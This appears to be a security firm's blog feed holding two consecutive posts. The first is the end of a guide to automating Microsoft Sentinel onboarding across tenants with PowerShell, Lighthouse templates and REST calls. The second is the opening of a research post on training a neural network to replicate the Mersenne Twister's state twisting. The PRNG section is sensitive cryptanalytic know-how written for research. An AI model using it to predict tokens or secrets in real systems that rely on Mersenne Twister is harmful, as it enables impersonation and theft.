        "TotalMinutes":  15,
        "TotalSeconds":  900
    },
    "Severity":  "{Severity}",
    "SuppressionDuration":  {
        "Ticks":  180000000000,
        "Days":  0,
        "Hours":  5,
        "Milliseconds":  0,
        "Minutes":  0,
        "Seconds":  0,
        "TotalDays":  0.20833333333333331,
        "TotalHours":  5,
        "TotalMilliseconds":  18000000,
        "TotalMinutes":  300,
        "TotalSeconds":  18000
    },
    "SuppressionEnabled":  false,
    "TriggerOperator":  0,
    "TriggerThreshold":  0,
    "Tactics":  [
        "DefenseEvasion"
    ],
    "Id":  "{alertRuleID}",
    "Name":  "{alertRuleguid}",
    "Type":  "Microsoft.SecurityInsights/alertRules",
    "Kind":  "Scheduled"
}

Let’s Lighthouse this up!

Now we have the service connections and initial client config in place, we can start building the Onboarding pipeline for Tenant B.

As part of this we will cover:

  • Generating consistent naming conventions
  • Creating the Log Analytics workspace specified in config and enabling Sentinel
  • Setting up the Lighthouse connection to Tenant A
  • Enabling the required Connectors in Sentinel

Consistent naming (optional)

There are a lot of different ways to handle naming conventions.

I quite like to push a few parameters into a PowerShell script, then write the naming conventions back to the pipeline, so the convention script can be used in multiple pipelines to provide consistency and easy maintainability.

The below script generates variables for a select number of resources, then pushes them out to the pipeline.

param(
    [string]$location,
    [string]$environment,
    [string]$customerIdentifier,
    [string]$instance
)
$location = $location.ToLower()
$environment = $environment.ToLower()
$customerIdentifier = $customerIdentifier.ToLower()
$instance = $instance.ToLower()
$conventions = New-Object -TypeName psobject 
$conventions | Add-Member -MemberType NoteProperty -Name CustomerResourceGroup -Value "rg-$($location)-$($environment)-$($customerIdentifier)$($instance)"
$conventions | Add-Member -MemberType NoteProperty -Name LogAnalyticsWorkspace -Value "la-$($location)-$($environment)-$($customerIdentifier)$($instance)"
$conventions | Add-Member -MemberType NoteProperty -Name CustLogicAppPrefix -Value "wf-$($location)-$($environment)-$($customerIdentifier)-"
$conventions | Add-Member -MemberType NoteProperty -Name CustFunctionAppPrefix -Value "fa-$($location)-$($environment)-$($customerIdentifier)-"
foreach($convention in $conventions.psobject.Properties | Select-Object -Property name, value)
{
Write-Host "##vso[task.setvariable variable=$($convention.name);isOutput=true]$($convention.Value)"
}

Sample use would be

  - task: PowerShell@2
    name: "naming"
    inputs:
      filePath: '$(Build.SourcesDirectory)/Scripts/PipelineLogic/GenerateNamingConvention.ps1'
      arguments: '-location "some Location" -environment "some environment" -customerIdentifier "some identifier" -instance "some instance"'

  - task: AzurePowerShell@5
    displayName: 'Sample task using variables from naming task'
    inputs:
      azureSubscription: '$(ServiceConnection)'
      ScriptType: 'FilePath'
      ScriptPath: 'some script path'
      ScriptArguments: '-resourceGroup "$(naming.StorageResourceGroup)" -workspaceName "$(naming.LogAnalyticsWorkspace)"'
      azurePowerShellVersion: 'LatestVersion'
      pwsh: true

Configure Log analytics workspace in sub tenant / enable Sentinel

You could do the following using ARM; however, in the actual solution I am doing a lot of additional tasks with the workspace that were much easier to achieve in script (hence my choice to script it instead).

Create new workspace if it doesn’t exist:

param(
[string]$resourceGroupName,
[string]$workspaceName,
[string]$Location,
[string]$sku
)
$rg = Get-AzResourceGroup -Name $resourceGroupName -ErrorAction SilentlyContinue
if(-not $rg)
{
New-AzResourceGroup -Name $resourceGroupName -Location $Location
}
$ws = Get-AzOperationalInsightsWorkspace -ResourceGroupName $resourceGroupName -Name $workspaceName -ErrorAction SilentlyContinue
if(-not $ws){
$ws = New-AzOperationalInsightsWorkspace -Location $Location -Name $workspaceName -Sku $sku -ResourceGroupName $resourceGroupName -RetentionInDays 90
}

Check if Sentinel is already enabled for the Workspace and enable it if not:

param(
[string]$resourceGroupName,
[string]$workspaceName
)
Install-Module AzSentinel -Scope CurrentUser -Force -AllowClobber
Import-Module AzSentinel

    $solutions = Get-AzOperationalInsightsIntelligencePack -resourcegroupname $resourceGroupName -WorkspaceName $workspaceName -ErrorAction SilentlyContinue

    if (($solutions | Where-Object Name -eq 'SecurityInsights').Enabled) {
        Write-Host "SecurityInsights solution is already enabled for workspace $($workspaceName)"
    }
    else {
        Set-AzSentinel -WorkspaceName $workspaceName -Confirm:$false
    }

Setting up Lighthouse to the Master tenant

param(
[string]$customerConfig='',
[string]$templateFile = '',
[string]$templateParameterFile='',
[string]$AadGroupID='',
[string]$tenantId=''
)
$config = Get-Content -Path $customerConfig |ConvertFrom-Json
$parameters = (Get-Content -Path $templateParameterFile -Raw) -replace '{principalId}' , $AadGroupID

Set-Content -Value $parameters -Path $templateParameterFile -Force
New-AzDeployment -Name "Lighthouse" -Location "$($config.Location)" -TemplateFile $templateFile -TemplateParameterFile $templateParameterFile -rgName "$($config.TargetResourceGroup)" -managedByTenantId "$tenantId" 

This script takes in the config file we generated earlier to read out the client or sub tenant values for location and the resource group in the sub tenant, then sets up Lighthouse with the below ARM template / parameter file after replacing the ‘{principalId}’ placeholder in the parameter file with the Azure AD group ID we set up earlier.

Note that in the Lighthouse ARM template and parameter file, we are keeping the permissions to an absolute minimum, so users in the Azure AD group in the master tenant will only be able to interact with the permissions granted using the role definition IDs specified.

If you are setting up Lighthouse for the management of additional parts of the Sub tenant, you can add and change the role definition IDs to suit your needs.

Lighthouse.parameters.json

{
  "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentParameters.json#",
  "contentVersion": "1.0.0.0",
  "parameters": {
    "mspOfferName": {
      "value": "Enter Offering Name"
    },
    "mspOfferDescription": {
      "value": "Enter Description"
    },
    "managedByTenantId": {
      "value": "ID OF YOUR MASTER TENANT"
    },
    "authorizations": {
      "value": [
        {
          "principalId": "{principalId}",
          "roleDefinitionId": "ab8e14d6-4a74-4a29-9ba8-549422addade",
          "principalIdDisplayName": " Sentinel Contributor"
        },
        {
          "principalId": "{principalId}",
          "roleDefinitionId": "3e150937-b8fe-4cfb-8069-0eaf05ecd056",
          "principalIdDisplayName": " Sentinel Responder"
        },
        {
          "principalId": "{principalId}",
          "roleDefinitionId": "8d289c81-5878-46d4-8554-54e1e3d8b5cb",
          "principalIdDisplayName": "Sentinel Reader"
        },
        {
          "principalId": "{principalId}",
          "roleDefinitionId": "f4c81013-99ee-4d62-a7ee-b3f1f648599a",
          "principalIdDisplayName": "Sentinel Automation Contributor"
        }
      ]
    },
    "rgName": {
      "value": "RG-Sentinel"
    }
  }
}


Lighthouse.json

{
    "$schema": "https://schema.management.azure.com/schemas/2018-05-01/subscriptionDeploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "parameters": {
        "mspOfferName": { "type": "string" },
        "mspOfferDescription": { "type": "string" },
        "managedByTenantId": { "type": "string" },
        "authorizations": { "type": "array" },
        "rgName": { "type": "string" }
    },
    "variables": {
        "mspRegistrationName": "[guid(parameters('mspOfferName'))]",
        "mspAssignmentName": "[guid(parameters('rgName'))]"
    },
    "resources": [
        {
            "type": "Microsoft.ManagedServices/registrationDefinitions",
            "apiVersion": "2019-06-01",
            "name": "[variables('mspRegistrationName')]",
            "properties": {
                "registrationDefinitionName": "[parameters('mspOfferName')]",
                "description": "[parameters('mspOfferDescription')]",
                "managedByTenantId": "[parameters('managedByTenantId')]",
                "authorizations": "[parameters('authorizations')]"
            }
        },
        {
            "type": "Microsoft.Resources/deployments",
            "apiVersion": "2018-05-01",
            "name": "rgAssignment",
            "resourceGroup": "[parameters('rgName')]",
            "dependsOn": [
                "[resourceId('Microsoft.ManagedServices/registrationDefinitions/', variables('mspRegistrationName'))]"
            ],
            "properties": {
                "mode": "Incremental",
                "template": {
                    "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
                    "contentVersion": "1.0.0.0",
                    "parameters": {},
                    "resources": [
                        {
                            "type": "Microsoft.ManagedServices/registrationAssignments",
                            "apiVersion": "2019-06-01",
                            "name": "[variables('mspAssignmentName')]",
                            "properties": {
                                "registrationDefinitionId": "[resourceId('Microsoft.ManagedServices/registrationDefinitions/', variables('mspRegistrationName'))]"
                            }
                        }
                    ]
                }
            }
        }
    ],
    "outputs": {
        "mspOfferName": {
            "type": "string",
            "value": "[concat('Managed by', ' ', parameters('mspOfferName'))]"
        },
        "authorizations": {
            "type": "array",
            "value": "[parameters('authorizations')]"
        }
    }
}

Enable Connectors

At the time of creating this solution, there were still a few connectors that could not be set via ARM and I imagine this will still be the case for new connectors as they get added to Sentinel, so I will provide the different ways of handling both deployment types and how to find out what body to include in the posts to the API.

For most connectors you can use existing solutions such as:

 Roberto Rodriguez’s Azure-Sentinel2Go

Or

GitHub – javiersoriano/sentinel-all-in-one

First, we install the required modules and get the list of connectors to enable for our client / sub tenant, then compare them to the list of connectors that are already enabled:

param(
    [string]$templateLocation = '',
    [string]$customerConfig 
)
$config = Get-Content -Path $customerConfig |ConvertFrom-Json
$connectors=$config.connectors
$resourceGroupName = $config.TargetResourceGroup
$WorkspaceName = $config.TargetWorkspaceName
$templateLocation

Install-Module AzSentinel -Scope CurrentUser -Force

$connectorList = $connectors -split ','
$rg = Get-AzResourceGroup -Name $resourceGroupName
$check = Get-AzSentinelDataConnector -WorkspaceName $WorkspaceName | select-object -ExpandProperty kind
$outputArray = $connectorList | Where-Object {$_ -notin $check} 
$tenantId = (get-azcontext).Tenant.Id
$subscriptionId = (Get-AzSubscription).Id

$Resource = "https://management.azure.com/"

Next, we attempt to deploy the connectors using the ARM templates from one of the above solutions.

foreach($con in $outputArray)
{
    write-host "deploying $($con)"
    $out = $null
    $out = New-AzResourceGroupDeployment -resourceGroupName "$($resourceGroupName)" -TemplateFile $templateLocation -dataConnectorsKind "$($con)" -workspaceName "$($WorkspaceName)" -securityCollectionTier "ALL" -tenantId "$($tenantId)" -subscriptionId "$($subscriptionId)" -mcasDiscoveryLogs $true -Location $rg.Location -ErrorAction SilentlyContinue
    if($out.ProvisioningState -eq "Failed")
    {
        write-host '------------------------'
        write-host "Unable to deploy $($con)"
        $out | Format-Table
        write-host '------------------------'
        Write-Host "##vso[task.LogIssue type=warning;]Unable to deploy $($con) CorrelationId: $($out.CorrelationId)"
    }
    else{
        write-host "deployed $($con)"
    }
}

If the connector fails to deploy, we write a warning message to the pipeline.

This will work for most connectors and might be all you need for your requirements.

If there is a connector not currently available, as the Active Directory Diagnostics connector was when I created this, we need to use a different approach. Thanks to Roberto Rodriguez for the suggestion.

  1. Using your favourite Browser, go to an existing Sentinel instance that allows you to enable the connector you need.
  2. Go through the steps of enabling the connector, then on the last step, when submitting, open the debug console (dev tools) in your browser and, on the Network tab, look through the POST requests made.
  3. There should be one containing the payload for the connector you just enabled, with the correct settings and URL to post to.
  4. Now we can replicate this payload in PowerShell and enable them automatically.

When enabling the connector, note the permissions required and ensure your ADO service connection meets the requirements!

Create the URI using the URL from the POST message, replacing required values such as the workspace name with the ones used for your target environment.

Example:

$uri = "/providers/microsoft.aadiam/diagnosticSettings/AzureSentinel_$($WorkspaceName)?api-version=2017-04-01"

Build up the JSON post message starting with static bits

           $payload =         '{
            "kind": "AzureActiveDirectoryDiagnostics",
            "properties": {
                "logs": [
                    {
                        "category": "SignInLogs",
                        "enabled": true
                    },
                    {
                        "category": "AuditLogs",
                        "enabled": true
                    },
                    {
                        "category": "NonInteractiveUserSignInLogs",
                        "enabled": true
                    },
                    {
                        "category": "ServicePrincipalSignInLogs",
                        "enabled": true
                    },
                    {
                        "category": "ManagedIdentitySignInLogs",
                        "enabled": true
                    },
                    {
                        "category": "ProvisioningLogs",
                        "enabled": true
                    }
                ]
            }
        }'|ConvertFrom-Json

Add additional required properties that were not included in the static part:

        $connectorProperties = $payload.properties
        $connectorProperties | Add-Member -NotePropertyName workspaceId -NotePropertyValue "/subscriptions/$($subscriptionId)/resourceGroups/$($resourceGroupName)/providers/Microsoft.OperationalInsights/workspaces/$($WorkspaceName)"

        $connectorBody = @{}

        $connectorBody | Add-Member -NotePropertyName name -NotePropertyValue "AzureSentinel_$($WorkspaceName)"
        $connectorBody.Add("properties",$connectorProperties)

And finally, try firing the request at Azure with a bit of error handling to write a warning to the pipeline if something goes wrong.

        try {
            $result = Invoke-AzRestMethod -Path $uri -Method PUT -Payload ($connectorBody | ConvertTo-Json -Depth 3)
            if ($result.StatusCode -eq 200) {
                Write-Host "Successfully enabled data connector: $($payload.kind)"
            }
            else {
                Write-Host  "##vso[task.LogIssue type=warning;]Unable to deploy $($con)  with error: $($result.Content)" 
            }
        }
        catch {
            $errorReturn = $_
            Write-Verbose $_
            Write-Host  "##vso[task.LogIssue type=warning;]Unable to deploy $($con)  with error: $errorReturn" 
        }

Phase 2: Deploy Sentinel analytics to Master tenant pointed at Sub tenant logs

If you followed all the above steps, onboarded a sub tenant, and are in the Azure AD group, you should now be able to see the sub tenant’s Log Analytics workspace in your Master Tenant Sentinel. At this stage you can also remove the service principal in the sub tenant.

If you cannot see it:

  • It sometimes takes 30+ minutes for Lighthouse connected tenants to show up in the master tenant.
  • Ensure you have the sub tenant selected in “Directories + Subscriptions”.
  • In Sentinel, make sure the subscription is selected in your filter.

Deploying a new analytic

First load a template analytic.

If you just exported the analytics from an existing Sentinel instance, you only need to make sure you set the workspace inside the query to the correct one.

$alert = (Get-Content -Path $file.FullName) | ConvertFrom-Json
$analyticsTemplate = $alert.detection_query -replace '{{targetWorkspace}}', ($config.TargetWorkspaceName)

In my case, I am loading a custom analytics file, so I need to combine it with my template file and set a few more bits.

  $alert = (Get-Content -Path $file.FullName) |ConvertFrom-Json 
      $workspaceName = '$(naming.LogAnalyticsWorkspace)'
      $resourceGroupName= '$(naming.CustomerResourceGroup)'
      $id = New-Guid
      $analyticsTemplate = (Get-Content -Path $detectionPath )  -replace '{DisplayPrefix}' , 'Sentinel-' -replace '{DisplayName}' , $alert.display_name   -replace '{DetectionName}' , $alert.detection_name  -replace '{{targetWorkspace}}' , ($config.TargetWorkspaceName) |ConvertFrom-Json 
      
      $QueryPeriod =([timespan]$alert.Interval)
      $lookbackPeriod = ([timespan]$alert.LookupPeriod)
      $SuppressionDuration = ([timespan]$alert.LookupPeriod)
      
      $alert.detection_query=$alert.detection_query  -replace '{{targetWorkspace}}' , ($config.TargetWorkspaceName)
      $alert.detection_query
      $tempDescription = $alert.description
      $analyticsTemplate.Severity = $alert.severity 

Create the analytic in Sentinel

When creating the analytics, you can either

  1. put them directly into the Analytics workspace that is now visible in the Master tenant through Lighthouse
  2. create a new workspace and point the analytics at the other workspace by adding workspace(targetworkspace) to all tables in your analytics, for example workspace(targetworkspace).DeviceEvents.

The latter solution keeps all the analytics in the Master tenant, so all queries can be stored there and do not go into the sub tenant (this can be useful for protecting intellectual property, or just for having all analytics in one single workspace pointing at all the others).

At the time of creating the automated solution for this, I had a few issues with the various ways of deploying analytics, which have hopefully been solved by now. Below is my workaround that is still fully functional.

  • The Az.SecurityInsights version of New-AzSentinelAlertRule did not allow me to set tactics on the analytic.
  • The azsentinel version did have a working way to add tactics, but failed to create the analytic properly
  • Neither of them worked for adding entities.

So, in a rather unpleasant solution, I:

  1. Create the initial analytic using Az.SecurityInsights\New-AzSentinelAlertRule
  2. Add the tactic using azsentinel\New-AzSentinelAlertRule
  3. Add the entities and final settings using the API
  # 1. Create the initial scheduled rule with Az.SecurityInsights
  Az.SecurityInsights\New-AzSentinelAlertRule -WorkspaceName $workspaceName -QueryPeriod $lookbackPeriod -Query $analyticsTemplate.detection_query -QueryFrequency $QueryPeriod -ResourceGroupName $resourceGroupName -AlertRuleId $id -Scheduled -Enabled -DisplayName $analyticsTemplate.DisplayName -Description $tempDescription -SuppressionDuration $SuppressionDuration -Severity $analyticsTemplate.Severity -TriggerOperator $analyticsTemplate.TriggerOperator -TriggerThreshold $analyticsTemplate.TriggerThreshold

  # 2. Re-apply the rule with azsentinel to set the tactics
  $newAlert = azsentinel\Get-AzSentinelAlertRule -WorkspaceName $workspaceName | Where-Object { $_.name -eq $id }
  $newAlert.Query = $alert.detection_query
  $newAlert.enabled = $analyticsTemplate.Enabled
  azsentinel\New-AzSentinelAlertRule -WorkspaceName $workspaceName -Kind $newAlert.kind -SuppressionEnabled $newAlert.suppressionEnabled -Query $newAlert.query -DisplayName $newAlert.displayName -Description $newAlert.description -Tactics $newAlert.tactics -QueryFrequency $newAlert.queryFrequency -Severity $newAlert.severity -Enabled $newAlert.enabled -QueryPeriod $newAlert.queryPeriod -TriggerOperator $newAlert.triggerOperator -TriggerThreshold $newAlert.triggerThreshold -SuppressionDuration $newAlert.suppressionDuration

  # 3. Add the entities, event grouping and final settings through the REST API
  $additionUri = $newAlert.id + '?api-version=2021-03-01-preview'
  $additionUri
  $result = Invoke-AzRestMethod -Path $additionUri -Method Get
  $entityCont = '[]' | ConvertFrom-Json
  $entities = $alert.analyticsEntities.entityMappings | ConvertTo-Json -Depth 4
  $content = $result.Content | ConvertFrom-Json
  $tactics = $alert.tactic.Split(',') | ConvertTo-Json

  $aggregation = 'SingleAlert'
  if ($alert.Grouping) {
      if ($alert.Grouping -eq 'AlertPerResult') {
          $aggregation = 'AlertPerResult'
      }
  }

      $body = '{"id":"'+$content.id+'","name":"'+$content.name+'","type":"Microsoft.SecurityInsights/alertRules","kind":"Scheduled","properties":{"displayName":"'+$content.properties.displayName+'","description":"'+$content.properties.description+'","severity":"'+$content.properties.severity+'","enabled":true,"query":'+($content.properties.query |ConvertTo-Json)+',"queryFrequency":"'+$content.properties.queryFrequency+'","queryPeriod":"'+$content.properties.queryPeriod+'","triggerOperator":"'+$content.properties.triggerOperator+'","triggerThreshold":'+$content.properties.triggerThreshold+',"suppressionDuration":"'+$content.properties.suppressionDuration+'","suppressionEnabled":false,"tactics":'+$tactics+',"alertRuleTemplateName":null,"incidentConfiguration":{"createIncident":true,"groupingConfiguration":{"enabled":false,"reopenClosedIncident":false,"lookbackDuration":"PT5H","matchingMethod":"AllEntities","groupByEntities":[],"groupByAlertDetails":[],"groupByCustomDetails":[]}},"eventGroupingSettings":{"aggregationKind":"'+$aggregation+'"},"alertDetailsOverride":null,"customDetails":null,"entityMappings":'+ $entities +'}}'
     
 $res = Invoke-AzRestMethod -path $additionUri -Method Put -Payload $body 

You should now have all the components needed to create your own multi-tenant, enterprise-scale pipelines.

The value from this solution comes from:

  1. Being able to quickly push custom-made analytics to a multitude of workspaces
  2. Being able to source control analytics and code review them before deploying
  3. Having the ability to manage all sub tenants from the same master tenant without having to create accounts in each tenant
  4. Consistent RBAC for all tenants
  5. Plenty of room to extend the solution


As mentioned at the start, this blog post only covers a small part of the overall deployment strategy we have at NCC Group, to illustrate the overall deployment workflow we’ve taken for Azure Sentinel. Upon this foundation, we’ve built a substantial ecosystem of custom analytics to support advanced detection and response.

Cracking Random Number Generators using Machine Learning – Part 2: Mersenne Twister

18 October 2021 at 13:00

1. Introduction

In part 1 of this post, we showed how to train a neural network to generate the exact sequence of a relatively simple pseudo-random number generator (PRNG), namely xorshift128. In that PRNG, each number is totally dependent on the last four generated numbers (which form the random number internal state). Although the ML model learned the hidden internal structure of the xorshift128 PRNG, xorshift128 is a very simple PRNG that we used only as a proof of concept.

The same concept applies to a PRNG with a more complex structure, namely the Mersenne Twister (MT). MT is by far the most widely used general-purpose (but still not cryptographically secure) PRNG [1]. It generates 32-bit words with a statistically uniform distribution and can have a very long period (2^19937 - 1 for MT19937). There are many variants of the MT PRNG that follow the same algorithm but differ in the constants and configurations of the algorithm. The most commonly used variant of MT is MT19937. Hence, for the rest of this article, we will focus on this variant of MT.

To crack the MT algorithm, we need first to examine how it works. In the next section, we will discuss how MT works.

** Editor’s Note: How does this relate to security? While the research in this blog post (and in Part 1 of this series) looks at a non-cryptographic PRNG, we are interested, generically, in understanding how machine learning-based approaches to finding latent patterns within functions presumed to be generating random output could work, as a prerequisite to attempting to use machine learning to find previously-unknown patterns in cryptographic (P)RNGs, as this could potentially serve as an interesting supplementary method for cryptanalysis of these functions. Here, we show our work in beginning to explore this space, extending the approach used for xorshift128 to Mersenne Twister, a non-cryptographic PRNG sometimes mistakenly used where a cryptographically-secure PRNG is required. **

2. How does MT19937 PRNG work?

MT can be considered a twisted form of the generalized linear-feedback shift register (LFSR). The idea of an LFSR is to use a linear function, such as XOR, with the old register value to get the register's new value. In MT, the internal state is saved as a sequence of 32-bit words. The size of the internal state depends on the MT variant; in the case of MT19937 it is 624 words. The pseudocode of MT, as shared on Wikipedia, is listed below.

 // Create a length n array to store the state of the generator
 int[0..n-1] MT
 int index := n+1
 const int lower_mask = (1 << r) - 1 // That is, the binary number of r 1's
 const int upper_mask = lowest w bits of (not lower_mask)
 
 // Initialize the generator from a seed
 function seed_mt(int seed) {
     index := n
     MT[0] := seed
     for i from 1 to (n - 1) { // loop over each element
         MT[i] := lowest w bits of (f * (MT[i-1] xor (MT[i-1] >> (w-2))) + i)
     }
 }
 
 // Extract a tempered value based on MT[index]
 // calling twist() every n numbers
 function extract_number() {
     if index >= n {
         if index > n {
           error "Generator was never seeded"
            // Alternatively, seed with constant value; 5489 is used in reference C code
         }
         twist()
     }
 
     int y := MT[index]
     y := y xor ((y >> u) and d)
     y := y xor ((y << s) and b)
     y := y xor ((y << t) and c)
     y := y xor (y >> l)
 
     index := index + 1
     return lowest w bits of (y)
 }
 
 // Generate the next n values from the series x_i 
 function twist() {
     for i from 0 to (n-1) {
         int x := (MT[i] and upper_mask)
                   + (MT[(i+1) mod n] and lower_mask)
         int xA := x >> 1
         if (x mod 2) != 0 { // lowest bit of x is 1
             xA := xA xor a
         }
         MT[i] := MT[(i + m) mod n] xor xA
     }
     index := 0
 } 

The first function is seed_mt, used to initialize the 624 state values using the initial seed and the linear XOR function. This function is straightforward, but we will not go into the details of its implementation as it is irrelevant to our goal. The main two functions we have are extract_number and twist. The extract_number function is called every time we want to generate a new random value. It starts by checking whether the state has been initialized; if not, it either initializes it by calling seed_mt with a constant seed or returns an error. The first step is then to call the twist function to twist the internal state, as we will describe later. This twist is called again after every 624 calls to the extract_number function. After that, the code uses the number at the current index (which goes from 0 up to 623) to temper one word from the state at that index using some linear XOR, SHIFT, and AND operations. At the end of the function, we increment the index and return the tempered state value.

The twist function changes the internal state to a new state at the beginning and after every 624 generated numbers. As we can see from the code, the function uses the values at indices i, i+1, and i+m to generate the new value at index i using some XOR, SHIFT, and AND operations similar to the tempering function above.

Please note that w, n, m, r, a, u, d, s, b, t, c, l, and f are predefined constants for the algorithm that may change from one version to another. The values of these constants for MT19937 are as follows:

  • (w, n, m, r) = (32, 624, 397, 31)
  • a = 0x9908B0DF
  • (u, d) = (11, 0xFFFFFFFF)
  • (s, b) = (7, 0x9D2C5680)
  • (t, c) = (15, 0xEFC60000)
  • l = 18
  • f = 1812433253
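
To make the later experiments concrete, here is a minimal Python sketch of the pseudocode above using the MT19937 constants. The class name and the next_state helper (which exposes the raw, untempered state words we use later for training data) are our own additions for illustration, not part of the reference implementation:

class MT19937:
    """Minimal MT19937 sketch following the pseudocode above."""
    w, n, m, r = 32, 624, 397, 31
    a = 0x9908B0DF
    u, d = 11, 0xFFFFFFFF
    s, b = 7, 0x9D2C5680
    t, c = 15, 0xEFC60000
    l = 18
    f = 1812433253
    lower_mask = (1 << r) - 1                 # 0x7FFFFFFF
    upper_mask = (~lower_mask) & 0xFFFFFFFF   # 0x80000000

    def __init__(self, seed=5489):
        self.MT = [0] * self.n
        self.index = self.n
        self.MT[0] = seed
        for i in range(1, self.n):
            self.MT[i] = (self.f * (self.MT[i - 1] ^ (self.MT[i - 1] >> (self.w - 2))) + i) & 0xFFFFFFFF

    def twist(self):
        for i in range(self.n):
            x = (self.MT[i] & self.upper_mask) + (self.MT[(i + 1) % self.n] & self.lower_mask)
            xA = x >> 1
            if x & 1:
                xA ^= self.a
            self.MT[i] = self.MT[(i + self.m) % self.n] ^ xA
        self.index = 0

    def next_state(self):
        """Return the next raw (untempered) state word; used later to build training data."""
        if self.index >= self.n:
            self.twist()
        y = self.MT[self.index]
        self.index += 1
        return y

    def extract_number(self):
        """Return the next tempered 32-bit output, as in the pseudocode."""
        y = self.next_state()
        y ^= (y >> self.u) & self.d
        y ^= (y << self.s) & self.b
        y ^= (y << self.t) & self.c
        y ^= y >> self.l
        return y & 0xFFFFFFFF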

3. Using Neural Networks to model the MT19937 PRNG

As we saw in the previous section, MT can be split into two main steps: twisting and tempering. The twisting step only happens once every n calls to the PRNG (where n equals 624 in MT19937) to twist the old state into a new state. The tempering step happens with each number generated, converting one of the 624 state words into a random number. Hence, we plan to use two NN models to learn each step separately. We will then use the two models together to reverse the whole PRNG: the reverse-tempering model takes a generated number back to its internal state, the twisting model produces the new state, and tempering the resulting state gives the expected new PRNG output.

3.1 Using NN for State Twisting

After checking the code listing for the twist function, we can see that the new state at position i depends on the variable xA and the old state value at position (i + m), where m equals 397 in MT19937. Also, the value of xA depends on the value of the variable x and some constant a. And the value of the variable x depends on the old state's values at positions i and i + 1.

Hence, we can deduce that, and without getting into the details, each new twisted state depends on three old states as follows:

MT[i] = f(MT[i - 624], MT[i - 624 + 1], MT[i - 624 + m])

    = f(MT[i - 624], MT[i - 623], MT[i - 227])     ( using m = 397 as in MT19937 )

We want to train an NN model to learn the function f hence effectively replicating the twisting step. To accomplish this, we have created a different function that generates the internal state (without tempering) instead of the random number. This allows us to correlate the internal states with each other, as described in the above formula.

3.1.1 Data Preparation

We have generated a sequence of 5,000,000 32-bit state words. We then formatted these states into three 32-bit inputs and one 32-bit output, which creates a dataset of roughly five million records (5,000,000 − 624). Then we split the data into training and testing sets, with only 100,000 records for the test set; the rest of the data is used for training.
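
A rough sketch of this preparation step, assuming the MT19937 class with its next_state helper from the earlier sketch and NumPy for the bit encoding (the helper names, seed, and shapes are illustrative, not the original notebook code). Bits are encoded LSB-first so that the indices match the tables later in this section:

import numpy as np

def to_bits(words, width=32):
    """0/1 matrix of the given words, least-significant bit first."""
    words = np.asarray(words, dtype=np.uint64)
    shifts = np.arange(width, dtype=np.uint64)
    return ((words[:, None] >> shifts) & 1).astype(np.float32)

# Generate raw, untempered state words (reduce N for a quicker experiment).
N = 5_000_000
rng = MT19937(seed=2021)
states = np.array([rng.next_state() for _ in range(N)], dtype=np.uint64)

# Each new state MT[i] depends on MT[i - 624], MT[i - 623] and MT[i - 227].
n = 624
X = np.concatenate([to_bits(states[0:N - n]),           # MT[i - 624]
                    to_bits(states[1:N - n + 1]),       # MT[i - 623]
                    to_bits(states[n - 227:N - 227])],  # MT[i - 227]
                   axis=1)                              # 96 input bits per record
y = to_bits(states[n:])                                 # 32 output bits: MT[i]

# Hold out 100,000 records for testing; train on the rest.
X_train, X_test = X[:-100_000], X[-100_000:]
y_train, y_test = y[:-100_000], y[-100_000:]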

3.1.2 Neural Network Model Design

Our proposed model would have 96 inputs in the input layer to represent the three old states at the specific locations described in the previous equation, 32 bits each, and 32 outputs in the output layer to represent the new 32-bit state. The main hyperparameters that we need to decide are the number of neurons/nodes and hidden layers. We have tested different model structures with different numbers of hidden layers and different numbers of neurons in each layer. Then we used Keras' BayesianOptimization to select the optimal number of hidden layers/neurons along with other optimization parameters (such as the learning rate), using a small subset of the training set for this optimization. We got multiple promising model structures and used the smallest one that had the most promising results.

3.1.3 Optimizing the NN Inputs

After training multiple models, we noticed that the weights connecting the first 31 bits of the 96 input bits to the first hidden layer nodes are almost always close to zero. This implies that those bits have no effect on the output bits, and hence we can ignore them in our training. Checking this observation against the MT implementation, we see that the state at position i is bitwise ANDed with a bitmask called upper_mask, which has a value of 1 in the MSB and 0 in the remaining bits when r is 31, as in MT19937. So, we only need the MSB of the state at position i. Hence, we can train our NN with only 65 input bits instead of 96.

Hence, our neural network structure ended up with the following model structure (the input layer is ignored):

_________________________________________________________________
Layer (type)                 Output Shape              Param #   
=================================================================
dense (Dense)                (None, 96)                6336      
_________________________________________________________________
dense_1 (Dense)              (None, 32)                3104      
=================================================================
Total params: 9,440
Trainable params: 9,440
Non-trainable params: 0
_________________________________________________________________

As we can see, the number of parameters (weights and biases) of the hidden layer is only 6,336 (65×96 weights + 96 biases), and the number of parameters of the output layer is 3,104 (96×32 weights + 32 biases), which gives a total of 9,440 parameters to train. The hidden layer activation function is relu, while the output layer activation function is sigmoid, as we expect a binary output. Here is a summary of the model parameters:

Twisting Model
  Model Type:             Dense Network
  #Layers:                2
  #Neurons:               128 Dense
  #Trainable Parameters:  9,440
  Activation Functions:   Hidden Layer: relu; Output Layer: sigmoid
  Loss Function:          binary_crossentropy
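
A minimal Keras sketch matching this structure, using the 65-bit input reduction described in Section 3.1.3 (the layer sizes, activations, and loss come from the summary above; the optimizer, epochs, and batch size are assumptions):

import numpy as np
from tensorflow import keras
from tensorflow.keras import layers

# Drop the 31 unused bits of the first state: keep its MSB (column 31 in the
# LSB-first encoding) plus the 64 bits of the second and third states.
X_train_65 = np.concatenate([X_train[:, 31:32], X_train[:, 32:]], axis=1)
X_test_65 = np.concatenate([X_test[:, 31:32], X_test[:, 32:]], axis=1)

twist_model = keras.Sequential([
    keras.Input(shape=(65,)),
    layers.Dense(96, activation="relu"),      # 65*96 + 96 = 6,336 parameters
    layers.Dense(32, activation="sigmoid"),   # 96*32 + 32 = 3,104 parameters
])
twist_model.compile(optimizer="adam", loss="binary_crossentropy",
                    metrics=["binary_accuracy"])

twist_model.fit(X_train_65, y_train, epochs=10, batch_size=4096,
                validation_data=(X_test_65, y_test))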

3.1.4 Model Results

After a few hours and some manual tweaking of the model architecture, we trained a model that achieved 100% bitwise accuracy for both the training and testing sets. To be more confident about what we achieved, we generated a new sample of 1,000,000 states using a different seed than the one used to generate the previous data. We got the same result of 100% bitwise accuracy when we tested with the newly generated data.

